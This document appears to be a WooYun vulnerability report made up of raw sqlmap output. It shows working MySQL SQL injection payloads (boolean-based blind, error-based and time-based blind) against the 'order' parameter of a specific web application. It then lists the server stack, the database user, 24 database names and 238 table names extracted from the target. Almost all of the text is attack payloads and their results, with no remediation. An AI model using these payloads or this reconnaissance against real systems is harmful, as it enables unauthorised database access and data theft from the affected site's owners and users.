WooYun.org

Parameter: order (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: classid=88&id=347&num=5&order=1 RLIKE (SELECT (CASE WHEN (5751=5751) THEN 1 ELSE 0x28 END))&sub=60
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: classid=88&id=347&num=5&order=1 AND (SELECT 2695 FROM(SELECT COUNT(*),CONCAT(0x716b6b7a71,(SELECT (ELT(2695=2695,1))),0x7176706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sub=60
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: classid=88&id=347&num=5&order=1 AND (SELECT * FROM (SELECT(SLEEP(5)))FfrU)&sub=60
---
web application technology: PHP 5.4.23
back-end DBMS: MySQL 5.0
current user:    '[email protected]:52156'
current user is DBA:    False
available databases [24]:
[*] bbs_hktv
[*] cdp
[*] cms_as
[*] cms_hktv
[*] information_schema
[*] jsbc-security
[*] meicam
[*] mysql
[*] odp
[*] onairfastedit
[*] onairtranscode
[*] ors
[*] performance_schema
[*] security_as
[*] security_hktv
[*] security_hn
[*] vms
[*] vms_as
[*] vms_hktv
[*] vms_jyg
[*] vms_sjs
[*] wechat_hn
[*] wechat_sjs
[*] yicloud_aliyun_rds_dummy_database
Database: cms_hktv
[238 tables]
+------------------------------+
| hks_ecms_article             |
| hks_ecms_article_check       |
| hks_ecms_article_check_data  |
| hks_ecms_article_data_1      |
| hks_ecms_article_doc         |
| hks_ecms_article_doc_data    |
| hks_ecms_article_doc_index   |
| hks_ecms_article_index       |
| hks_ecms_download            |
| hks_ecms_download_check      |
| hks_ecms_download_check_data |
| hks_ecms_download_data_1     |
| hks_ecms_download_doc        |
| hks_ecms_download_doc_data   |
| hks_ecms_download_doc_index  |
| hks_ecms_download_index      |
| hks_ecms_flash               |
| hks_ecms_flash_check         |
| hks_ecms_flash_check_data    |
| hks_ecms_flash_data_1        |
| hks_ecms_flash_doc           |
| hks_ecms_flash_doc_data      |
| hks_ecms_flash_doc_index     |
| hks_ecms_flash_index         |
| hks_ecms_info                |
| hks_ecms_info_check          |
| hks_ecms_info_check_data     |
| hks_ecms_info_data_1         |
| hks_ecms_info_doc            |
| hks_ecms_info_doc_data       |
| hks_ecms_info_doc_index      |
| hks_ecms_info_index          |
| hks_ecms_infoclass_article   |
| hks_ecms_infoclass_download  |
| hks_ecms_infoclass_flash     |
| hks_ecms_infoclass_info      |
| hks_ecms_infoclass_movie     |
| hks_ecms_infoclass_news      |
| hks_ecms_infoclass_photo     |
| hks_ecms_infoclass_shop      |
| hks_ecms_infotmp_article     |
| hks_ecms_infotmp_download    |
| hks_ecms_infotmp_flash       |
| hks_ecms_infotmp_info        |
| hks_ecms_infotmp_movie       |
| hks_ecms_infotmp_news        |
| hks_ecms_infotmp_photo       |
| hks_ecms_infotmp_shop        |
| hks_ecms_movie               |
| hks_ecms_movie_check         |
| hks_ecms_movie_check_data    |
| hks_ecms_movie_data_1        |
| hks_ecms_movie_doc           |
| hks_ecms_movie_doc_data      |
| hks_ecms_movie_doc_index     |
| hks_ecms_movie_index         |
| hks_ecms_news                |
| hks_ecms_news_check          |
| hks_ecms_news_check_data     |
| hks_ecms_news_data_1         |
| hks_ecms_news_doc            |
| hks_ecms_news_doc_data       |
| hks_ecms_news_doc_index      |
| hks_ecms_news_index          |
| hks_ecms_photo               |
| hks_ecms_photo_check         |
| hks_ecms_photo_check_data    |
| hks_ecms_photo_data_1        |
| hks_ecms_photo_doc           |
| hks_ecms_photo_doc_data      |
| hks_ecms_photo_doc_index     |
| hks_ecms_photo_index         |
| hks_ecms_shop                |
| hks_ecms_shop_check          |
| hks_ecms_shop_check_data     |
| hks_ecms_shop_data_1         |
| hks_ecms_shop_doc            |
| hks_ecms_shop_doc_data       |
| hks_ecms_shop_doc_index      |
| hks_ecms_shop_index          |
| hks_enewsad                  |
| hks_enewsadclass             |
| hks_enewsadminstyle          |
| hks_enewsbefrom              |
| hks_enewsbq                  |
| hks_enewsbqclass             |
| hks_enewsbqtemp              |
| hks_enewsbqtempclass         |
| hks_enewsbuybak              |
| hks_enewsbuygroup            |
| hks_enewscard                |
| hks_enewsclass               |
| hks_enewsclass_stats         |
| hks_enewsclass_stats_ip      |
| hks_enewsclass_stats_set     |
| hks_enewsclassadd            |
| hks_enewsclassf              |
| hks_enewsclassnavcache       |
| hks_enewsclasstemp           |
| hks_enewsclasstempclass      |
| hks_enewsdiggips             |
| hks_enewsdo                  |
| hks_enewsdolog               |
| hks_enewsdownerror           |
| hks_enewsdownrecord          |
| hks_enewsdownurlqz           |
| hks_enewserrorclass          |
| hks_enewsf                   |
| hks_enewsfava                |
| hks_enewsfavaclass           |
| hks_enewsfeedback            |
| hks_enewsfeedbackclass       |
| hks_enewsfeedbackf           |
| hks_enewsfile_1              |
| hks_enewsfile_member         |
| hks_enewsfile_other          |
| hks_enewsfile_public         |
| hks_enewsgbook               |
| hks_enewsgbookclass          |
| hks_enewsgfenip              |
| hks_enewsgroup               |
| hks_enewshmsg                |
| hks_enewshnotice             |
| hks_enewshy                  |
| hks_enewshyclass             |
| hks_enewsindexpage           |
| hks_enewsinfoclass           |
| hks_enewsinfotype            |
| hks_enewsinfovote            |
| hks_enewsjstemp              |
| hks_enewsjstempclass         |
| hks_enewskey                 |
| hks_enewskeyclass            |
| hks_enewslink                |
| hks_enewslinkclass           |
| hks_enewslinktmp             |
| hks_enewslisttemp            |
| hks_enewslisttempclass       |
| hks_enewslog                 |
| hks_enewsloginfail           |
| hks_enewsmember              |
| hks_enewsmember_connect      |
| hks_enewsmember_connect_app  |
| hks_enewsmemberadd           |
| hks_enewsmemberf             |
| hks_enewsmemberfeedback      |
| hks_enewsmemberform          |
| hks_enewsmembergbook         |
| hks_enewsmembergroup         |
| hks_enewsmemberpub           |
| hks_enewsmenu                |
| hks_enewsmenuclass           |
| hks_enewsmod                 |
| hks_enewsnewstemp            |
| hks_enewsnewstempclass       |
| hks_enewsnotcj               |
| hks_enewsnotice              |
| hks_enewspage                |
| hks_enewspageclass           |
| hks_enewspagetemp            |
| hks_enewspayapi              |
| hks_enewspayrecord           |
| hks_enewspic                 |
| hks_enewspicclass            |
| hks_enewspl_1                |
| hks_enewspl_set              |
| hks_enewsplayer              |
| hks_enewsplf                 |
| hks_enewspltemp              |
| hks_enewspostdata            |
| hks_enewspostserver          |
| hks_enewsprinttemp           |
| hks_enewspublic              |
| hks_enewspublic_update       |
| hks_enewspubtemp             |
| hks_enewspubvar              |
| hks_enewspubvarclass         |
| hks_enewsqmsg                |
| hks_enewssearch              |
| hks_enewssearchall           |
| hks_enewssearchall_load      |
| hks_enewssearchtemp          |
| hks_enewssearchtempclass     |
| hks_enewsshop_address        |
| hks_enewsshop_ddlog          |
| hks_enewsshop_precode        |
| hks_enewsshop_set            |
| hks_enewsshopdd              |
| hks_enewsshopdd_add          |
| hks_enewsshoppayfs           |
| hks_enewsshopps              |
| hks_enewssp                  |
| hks_enewssp_1                |
| hks_enewssp_2                |
| hks_enewssp_3                |
| hks_enewssp_3_bak            |
| hks_enewsspacestyle          |
| hks_enewsspclass             |
| hks_enewssql                 |
| hks_enewstable               |
| hks_enewstags                |
| hks_enewstagsclass           |
| hks_enewstagsdata            |
| hks_enewstask                |
| hks_enewstempbak             |
| hks_enewstempdt              |
| hks_enewstempgroup           |
| hks_enewstempvar             |
| hks_enewstempvarclass        |
| hks_enewstogzts              |
| hks_enewsuser                |
| hks_enewsuseradd             |
| hks_enewsuserclass           |
| hks_enewsuserjs              |
| hks_enewsuserjsclass         |
| hks_enewsuserlist            |
| hks_enewsuserlistclass       |
| hks_enewsuserloginck         |
| hks_enewsvote                |
| hks_enewsvotemod             |
| hks_enewsvotetemp            |
| hks_enewswapstyle            |
| hks_enewswfinfo              |
| hks_enewswfinfolog           |
| hks_enewswords               |
| hks_enewsworkflow            |
| hks_enewsworkflowitem        |
| hks_enewswriter              |
| hks_enewsyh                  |
| hks_enewszt                  |
| hks_enewsztadd               |
| hks_enewsztclass             |
| hks_enewsztf                 |
| hks_enewsztinfo              |
| hks_enewszttype              |
| hks_enewszttypeadd           |
| hks_tv                       |
| hks_tv_playlist              |
+------------------------------+